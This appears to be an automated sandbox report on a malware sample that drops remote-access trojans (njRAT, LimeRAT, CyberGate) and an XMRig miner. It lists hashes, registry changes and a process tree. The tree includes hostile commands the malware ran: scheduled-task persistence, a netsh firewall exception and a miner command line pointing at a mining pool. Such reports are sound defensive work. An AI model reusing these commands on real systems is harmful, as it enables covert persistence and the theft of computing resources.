C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/1632-107-0x0000000000080000-0x00000000000CC000-memory.dmp
\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
| MD5 | a38702ff13a83f2177bb45d99f4f6e4e |
| SHA1 | 198b0c4f73781639d40d90b7c55221ebaaadc477 |
| SHA256 | 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926 |
| SHA512 | 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3 |
C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
| MD5 | a38702ff13a83f2177bb45d99f4f6e4e |
| SHA1 | 198b0c4f73781639d40d90b7c55221ebaaadc477 |
| SHA256 | 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926 |
| SHA512 | 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3 |
memory/592-112-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
| MD5 | a38702ff13a83f2177bb45d99f4f6e4e |
| SHA1 | 198b0c4f73781639d40d90b7c55221ebaaadc477 |
| SHA256 | 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926 |
| SHA512 | 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3 |
memory/1560-116-0x0000000000090000-0x000000000009C000-memory.dmp
memory/1632-115-0x0000000000080000-0x00000000000CC000-memory.dmp
memory/1560-118-0x0000000000090000-0x000000000009C000-memory.dmp
memory/1560-122-0x000000000009823E-mapping.dmp
memory/1560-123-0x0000000000090000-0x000000000009C000-memory.dmp
memory/1560-124-0x0000000000090000-0x000000000009C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
| MD5 | a38702ff13a83f2177bb45d99f4f6e4e |
| SHA1 | 198b0c4f73781639d40d90b7c55221ebaaadc477 |
| SHA256 | 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926 |
| SHA512 | 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3 |
C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/1896-129-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/1820-132-0x00000000001A0000-0x0000000000830000-memory.dmp
memory/1340-135-0x0000000000400000-0x000000000040C000-memory.dmp
memory/1340-139-0x000000000040823E-mapping.dmp
memory/1340-140-0x0000000000400000-0x000000000040C000-memory.dmp
memory/1340-141-0x0000000000400000-0x000000000040C000-memory.dmp
memory/1632-142-0x0000000010410000-0x0000000010471000-memory.dmp
memory/1896-145-0x0000000010410000-0x0000000010471000-memory.dmp
memory/1896-147-0x0000000010410000-0x0000000010471000-memory.dmp
memory/592-148-0x00000000003D0000-0x0000000000486000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XX--XX--XX.txt
| MD5 | 06c726690de1e0bf2ee467d6da373c60 |
| SHA1 | f98af670a712cfc223c444d6beb0803642054260 |
| SHA256 | d884fb142b4dd02afc9e7a903cd5ef618d39525b31ff35edbaa79a4e768738fc |
| SHA512 | 90716d4b014333d9eefb86576d29c5ee45aaa7e20cc3266e82860c084d8fda17611d08b05ccc23f0e16affe73ab6dd209a446cfa805fbb3c5ecf95fe7b5f418e |
\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
Analysis: behavioral2
Detonation Overview
Submitted
2022-05-25 01:11
Reported
2022-05-25 01:16
Platform
win10v2004-20220414-en
Max time kernel
24s
Max time network
168s
Command Line
Signatures
CyberGate, Rebhip
LimeRAT
njRAT/Bladabindi
xmrig
XMRig Miner Payload
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\moxia.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\li4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
Modifies Windows Firewall
UPX packed file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\li4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\moxia.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\moxia.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BGPRAZQPUI = "C:\\Users\\Admin\\AppData\\Local\\MQSCAPIYWJHJXYP\\SystemProcess.exe" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
AutoIT Executable
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4708 set thread context of 2128 | N/A | C:\Users\Admin\AppData\Local\Temp\li4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 3004 set thread context of 408 | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | C:\Users\Admin\AppData\Local\Temp\c.exe |
| PID 3232 set thread context of 2064 | N/A | C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\winmgmts:\root\cimv2 | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"
C:\Users\Admin\AppData\Local\Temp\moxia.EXE
"C:\Users\Admin\AppData\Local\Temp\moxia.EXE"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Users\Admin\AppData\Local\Temp\li4.exe
"C:\Users\Admin\AppData\Local\Temp\li4.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
C:\Users\Admin\AppData\Local\Temp\n.exe
"C:\Users\Admin\AppData\Local\Temp\n.exe"
C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
"C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 55
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 416 -p 4076 -ip 4076
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4076 -s 800
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 484 -p 4644 -ip 4644
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4644 -s 800
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
Network
Files
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
memory/4076-212-0x00007FFF9AD40000-0x00007FFF9B801000-memory.dmp
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/2124-216-0x0000000000580000-0x000000000058C000-memory.dmp
memory/568-221-0x0000000001400000-0x000000000144C000-memory.dmp
memory/568-220-0x0000000000000000-mapping.dmp
memory/568-233-0x0000000001400000-0x000000000144C000-memory.dmp
memory/568-232-0x0000000001400000-0x000000000144C000-memory.dmp
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/2124-215-0x0000000000000000-mapping.dmp
memory/3784-235-0x0000000000000000-mapping.dmp
memory/3480-234-0x0000000000000000-mapping.dmp
memory/4560-237-0x0000000000000000-mapping.dmp
memory/4056-236-0x0000000000000000-mapping.dmp
memory/608-238-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
| MD5 | 6efec1ae1365a1aa84d3c030b9a8ff39 |
| SHA1 | 7391ea75580e1353d7f4e089ed04723533c64601 |
| SHA256 | 86e0339e72c99d4913f0f19476d8798b86404630fa73f259d3cd6ff75a4a50cf |
| SHA512 | 5ceb1f0cdbbd8a22043866b3e445684b6224d628f37560271ba59bd5b2e68c2a71207eca9998993bef4ea24e2d03e79e883eb7f05afb8dbb919e0869716dbfcd |
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
| MD5 | 4d9b81630965b6fedc6a74f17640a091 |
| SHA1 | dc82f73f7fe5dd559b1dbbf8eb359b0e0193f1f6 |
| SHA256 | 46aacf7129aff614e9ba2e2ddc345d02bc5c88ca58904dc74d5aac149fda7f61 |
| SHA512 | 617dd1b67a135a1a295f8cea2d28ac6c7c6016a5fe1a8a2517423bae475a175622c3d4f3c5f564de78cc2110b8c969d2ab18b11ae010a25d3fd41185c7c8e0ff |
memory/408-241-0x0000000000000000-mapping.dmp
memory/408-246-0x000000006EB30000-0x000000006F0E1000-memory.dmp
memory/384-247-0x0000000000000000-mapping.dmp
memory/556-248-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log
| MD5 | 9f893d94b017a0684012d50319c9ffbe |
| SHA1 | 140cc2cb6b2520ba4f9a1f666a5f679853472793 |
| SHA256 | 8a7cb420c82edf1bb2c7bdfef52091e5169fabaecc370e120985e91406fcbbec |
| SHA512 | 4b7df94d3622b82d852b0f532d7fd810ca2113d7b737ec417023d5b2142e9e79414a06d22647d73f8bc114f8e871a3a741a479b0aba48892f9078975ec78acba |
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
| MD5 | 8e42b462d64f31e8f8b90f121a873b39 |
| SHA1 | 7debe9f369937f1d17a8bb9e813b912b0ada1ead |
| SHA256 | 05be1d1b144d3b044d98eb75acabc7b688d4b5d3535ed340afa0e97f9bca4112 |
| SHA512 | 61fc2e12e86677bb202e10999ade1299df1c93b3048577aee5a087ec37e6fb675443f5b4afa51d900ce7db3d9c94fcb02822215d7b613d4004e155dddf429329 |
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
memory/4764-252-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
| MD5 | 657f403a19497b80aefa11dfb75f4600 |
| SHA1 | c2c296140be72560a9602b8e918133f7991f65b3 |
| SHA256 | 415830b94630e82b4460b4ff755a3049cb5558f30a5660d6923f61f3af7cd53c |
| SHA512 | 346e28c3fbd3e92b8b9a4ececeb45278bff97091e45c3519a42b7348cb826840a131d35db77b11e7537fab6bbc8da3eb8a99eae31168812ca45f20f1eebcfe04 |
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
| MD5 | c9d867ee51bbdedf69adf18c62657d09 |
| SHA1 | 357975b6b94eba762375c2b5ac96083973ccc22f |
| SHA256 | c3f5013436c2ff0f41dd68391ad243e3cb376fde386f2b73ca1cc2d3d11a9026 |
| SHA512 | cb4f2411462e9b39a1902abe70d866f6b41916448ff91b3ad553a2534916f2fd22efbf5992795986314a27b51383117f29783f9e623d83d73832a82f2e254e5a |
C:\Users\Admin\AppData\Roaming\efsui\data.exe
| MD5 | 19798d808798340e03649c9543412ae7 |
| SHA1 | e6196ccfd4db48ca82b4d74ab2013513f59ac610 |
| SHA256 | b8c8dbe499eeea2a2919cdedc3edfd30371363875d91832598abfade68d63c36 |
| SHA512 | e1f89b56eea160f883f84239521078db88f5e73d0e76717985fa31ed519474a5cd264e5c2322e1da02b5130457490bfc3a4757569c7f7e9f0dc6d7f0381e2b6d |
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | c637c8d000e3e666d38f6270b8c7409d |
| SHA1 | 37f52d05ecf8f03cfa31e7bf6b822ce57e0644aa |
| SHA256 | fb6956f3a7ad50837ccfa07783f35a93e1d172769db981fd7e8e0899f6940320 |
| SHA512 | 9091a745404197600d272f3ac3d934905857fe7e7e1d25f25563e5b6fea23c1b67341a7c0f9c69fa67c2e696e7ee15adac571029207cf65b52cc8da88380cb04 |
C:\Users\Admin\AppData\Roaming\efsui\data.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
C:\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | c3e5173973852eaa2a61ac4cb6b44ee7 |
| SHA1 | ebd3032065022d2e895a0bf3cf698d5b4dc27ca1 |
| SHA256 | e3346152388318a7a6e61a8593b293cec79798ad74f2f340fd14861aae89cf39 |
| SHA512 | 44f4cfe2be5dc6f2dfcbfd507b48b5dc30bcea15e8cc1e8aa95f50d165cf03aa0de86471cff0edc05d7c9fdcb577f596b2fce78ce0b96f521d24e789116961c1 |
memory/1280-267-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | 1c3edd75bbb85f58f247d06eeeb78937 |
| SHA1 | 1627b8e3e55d75d8128ef908496f68e0a33ae574 |
| SHA256 | 5bfa9ea2ab1604b8246b753822f137f40549f9517e453f0c355612df1fdc070a |
